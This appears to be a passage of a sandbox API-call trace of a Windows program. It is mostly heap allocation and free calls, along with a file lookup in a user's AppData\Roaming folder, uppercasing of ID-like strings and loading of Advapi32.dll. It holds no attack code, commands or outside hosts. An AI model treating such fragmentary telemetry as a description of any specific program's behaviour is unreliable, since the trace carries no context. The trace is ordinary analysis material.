[0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0150.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0150.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0150.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0150.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0150.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0150.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0150.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.837] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/sn-hlisepFoxRII.xls", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d140e20, ftCreationTime.dwHighDateTime=0x1d5d394, ftLastAccessTime.dwLowDateTime=0xa6c241d0, ftLastAccessTime.dwHighDateTime=0x1d5ce4d, ftLastWriteTime.dwLowDateTime=0xa6c241d0, ftLastWriteTime.dwHighDateTime=0x1d5ce4d, nFileSizeHigh=0x0, nFileSizeLow=0xfbac, dwReserved0=0x0, dwReserved1=0x0, cFileName="sn-hlisepFoxRII.xls", cAlternateFileName="SN-HLI~1.XLS")) returned 0x9e1c78 [0150.837] FindClose (in: hFindFile=0x9e1c78 | out: hFindFile=0x9e1c78) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.838] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0150.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0150.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0150.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0150.839] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0150.839] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.839] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0150.839] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.840] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0150.840] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.840] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.840] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0150.840] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.840] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0150.840] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.841] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0150.841] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.841] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.841] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.841] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0150.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0150.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.845] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.845] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.845] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0150.846] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.846] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.846] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 